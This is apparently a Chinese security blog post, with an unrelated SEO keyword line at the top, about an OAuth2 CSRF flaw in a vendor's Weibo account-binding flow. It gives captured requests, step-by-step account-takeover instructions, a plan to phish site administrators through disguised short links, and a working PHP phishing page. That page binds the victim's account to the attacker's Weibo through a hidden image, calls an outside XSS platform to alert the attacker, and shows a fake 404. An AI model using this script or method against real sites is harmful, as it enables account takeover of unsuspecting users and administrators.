娱乐网站代理商怎么做,wordpress修改绑定域名,网页设计的发展趋势,博客一号WordPress0x00 前言 文章中的项目地址统一修改为: a.test.com 保护厂商也保护自己 0x01 OAuth2.0 经常出现的地方 1#xff1a;网站登录处 2#xff1a;社交帐号绑定处 0x02 某厂商绑定微博请求包 0x02.1 请求包1#xff1a; Request: GET https://www.a.test.com/users/auth/weibo?…0x00 前言 文章中的项目地址统一修改为: a.test.com 保护厂商也保护自己 0x01 OAuth2.0 经常出现的地方 1网站登录处 2社交帐号绑定处 0x02 某厂商绑定微博请求包 0x02.1 请求包1 Request: GET https://www.a.test.com/users/auth/weibo?can_transfertrue HTTP/1.1
Host: www.a.test.com Response: HTTP/1.1 302 Found
Server: Tengine
Content-Type: text/html; charsetutf-8
Connection: keep-alive
Date: Mon, 18 Mar 2019 10:35:32 GMT
X-Frame-Options: DENY
X-XSS-Protection: 1; modeblock
X-Content-Type-Options: nosniff
Location: https://api.weibo.com/oauth2/authorize?client_id1881139527redirect_urihttp%3A%2F%2Fwww.a.test.com%2Fusers%2Fauth%2Fweibo%2Fcallbackresponse_typecodestate%257B%2522can_transfer%2522%253A%2522true%2522%257D
Cache-Control: no-cache
Set-Cookie: read_modeday; path/
Set-Cookie: default_fontfont2; path/
Set-Cookie: localezh-CN; path/
Set-Cookie: _m7e_session_core62d46938b5d57bcfe0ef1f3e18c52851; domain.a.test.com; path/; expiresMon, 18 Mar 2019 16:35:32 -0000; secure; HttpOnly
Set-Cookie: signin_redirect; domainwww.a.test.com; path/; max-age0; expiresThu, 01 Jan 1970 00:00:00 -0000
X-Request-Id: a921c890-a33b-4b52-ab49-bc67597e3cca
X-Runtime: 0.064185
Strict-Transport-Security: max-age31536000; includeSubDomains; preload
Via: cache15.l2cm12-6[78,0], cache6.cn544[108,0]
Timing-Allow-Origin: *
EagleId: 7ce8aa4615529053323375762e
Content-Length: 290
htmlbodyYou are being a hrefhttps://api.weibo.com/oauth2/authorize?client_id1881139527amp;redirect_urihttp%3A%2F%2Fwww.a.test.com%2Fusers%2Fauth%2Fweibo%2Fcallbackamp;response_typecodeamp;state%257B%2522can_transfer%2522%253A%2522true%2522%257Dredirected/a./body/html 0x02.2 请求包2 Request: GET https://api.weibo.com/oauth2/authorize?client_id1881139527redirect_urihttp%3A%2F%2Fwww.a.test.com%2Fusers%2Fauth%2Fweibo%2Fcallbackresponse_typecodestate%257B%2522can_transfer%2522%253A%2522true%2522%257D HTTP/1.1
Host: api.weibo.com Response: HTTP/1.1 302 Found
Server: nginx/1.6.1
Date: Mon, 18 Mar 2019 10:35:32 GMT
Content-Length: 0
Connection: keep-alive
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://www.a.test.com/users/auth/weibo/callback?state%7B%22can_transfer%22%3A%22true%22%7Dcodec593bc150745c37a4d5ec05332d406af 0x02.3 请求包3 Request: GET https://www.a.test.com/users/auth/weibo/callback?state%7B%22can_transfer%22%3A%22true%22%7Dcodec593bc150745c37a4d5ec05332d406af HTTP/1.1
Host: www.a.test.com Response: HTTP/1.1 302 Found
Server: Tengine
Content-Type: text/html; charsetutf-8
Connection: keep-alive
Date: Mon, 18 Mar 2019 10:35:33 GMT
X-Frame-Options: DENY
X-XSS-Protection: 1; modeblock
X-Content-Type-Options: nosniff
Location: https://www.a.test.com/settings/profile
Cache-Control: no-cache
Set-Cookie: read_modeday; path/
Set-Cookie: default_fontfont2; path/
Set-Cookie: localezh-CN; path/
Set-Cookie: bind_sns_result%257B%2522code%2522%3A-1%257D; path/; expiresMon, 18 Mar 2019 10:40:33 -0000
Set-Cookie: _m7e_session_core62d46938b5d57bcfe0ef1f3e18c52851; domain.a.test.com; path/; expiresMon, 18 Mar 2019 16:35:33 -0000; secure; HttpOnly
Set-Cookie: signin_redirect; domainwww.a.test.com; path/; max-age0; expiresThu, 01 Jan 1970 00:00:00 -0000
X-Request-Id: 4f4b792f-967e-45f8-a71d-adb88e600e19
X-Runtime: 0.391071
Strict-Transport-Security: max-age31536000; includeSubDomains; preload
Via: cache15.l2cm12-6[403,0], cache6.cn544[434,0]
Timing-Allow-Origin: *
EagleId: 7ce8aa4615529053326897836e
Content-Length: 106
htmlbodyYou are being a hrefhttps://www.a.test.com/settings/profileredirected/a./body/html 0x03 例子某厂商第三方登录绑定漏洞利用-点我就绑定你微博登录你账号 这里需要使用到一个微博账号与两个某厂商账号 微博账号182**77 (攻击者) 某厂商账号A33*493qq.com (攻击者) 某厂商账号B28*165qq.com (无辜受害者) 步骤1攻击者-登录微博 步骤2攻击者-使用某厂商账号A 登录 从上面看其实有很多绑定账号快捷登录的方法,但是微博绑定的用户肯定是比较少的所以我们用它 步骤3攻击者-点击绑定微博抓包 绑定微博的urlhttps://www.a.test.com/users/auth/weibo/callback?state{can_transfer%3Atrue}codec593bc150745c37a4d5ec05332d406af 这个url中的code就是我的微博一次性token 步骤4无辜受害者-使用某厂商账号B 登录 将url发送给账号B 打开https://www.a.test.com/users/auth/weibo/callback?state{can_transfer%3Atrue}codec593bc150745c37a4d5ec05332d406af 这时提示绑定成功了~~~ 嘿嘿嘿 步骤5攻击者-点开浏览器,选择微博登录 0x04 某厂商账号绑定漏洞-深入利用思考 首先经过我的观察,某厂商前后端是使用一个账号的 : )
攻击思路: 某厂商中有一个功能某信,我们可以发送一个有害的短链接url某信给管理员,诱惑管理员打开,让管理员绑定我们的微博,然后我们登录后台 使用新浪短域名(降低管理员内心警戒) 有人访问url时是发送qq邮件到我的邮箱 这个脚本完成以后,理想的攻击方式应该就是这样的受害者--点击新浪短链接url--跳转到我的钓鱼网站--输出绑定url进行绑定--利用xss平台发送邮件通知我--页面显示404--结束 0x05 简单脚本 # a_test_oauth_csrf.php
# 然后把这个文件改一下名字,放外网,然后钓鱼等待
?php
function curlRequest($url, $post [], $cookie , $referurl ) {if (!$referurl) {$referurl https://www.a.test.com;}$header array(Content-Type:application/x-www-form-urlencoded,X-Requested-With:XMLHttpRequest,);$curl curl_init();curl_setopt($curl, CURLOPT_URL, $url);curl_setopt($curl, CURLOPT_USERAGENT, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE));curl_setopt($curl, CURLOPT_AUTOREFERER, 1);curl_setopt($curl, CURLOPT_REFERER, $referurl);curl_setopt($curl, CURLOPT_HTTPHEADER, $header);curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,FALSE);if ($post) {curl_setopt($curl, CURLOPT_POST, 1);curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post));}if ($cookie) {curl_setopt($curl, CURLOPT_COOKIE, $cookie);}curl_setopt($curl, CURLOPT_TIMEOUT, 10);curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);curl_exec($curl);$header_data curl_getinfo($curl);if (curl_errno($curl)) {return curl_error($curl);}curl_close($curl);return $header_data;
}
// 某厂商的授权url-固定写死即可
$url https://api.weibo.com/oauth2/authorize?client_id1881139527redirect_urihttp%3A%2F%2Fwww.a.test.com%2Fusers%2Fauth%2Fweibo%2Fcallbackresponse_typecodestate%257B%2522can_transfer%2522%253A%2522true%2522%257D;
// 将你新浪微博cookie写入这里
$cookie 我的cookie可不给你们哦;
$result curlRequest($url, [], $cookie);
// 那两个js随便找个xss平台即可
// 一个用来表示登录过期了
// 一个用来表示钓鱼成功了
if (!$result[redirect_url]) {// echo 登录过期;echo ScRipT sRchttp://xxxxx.cn/ExiptZI/SCriPt;
} else {// echo 我还能搞事;// echo $result[redirect_url];echo img src.$result[redirect_url]. styledisplay:none;;echo ScRipT sRchttp://xxxxx.cn/Exi0TCW/SCriPt;
}
http_response_code(404);
echo div404 网页已删除/div; 放置外网http://127.0.0.1/a_test_oauth_csrf.php 发送给各大管理员
然后安静的做一个美少女等待即可
xss平台http://xss.tf
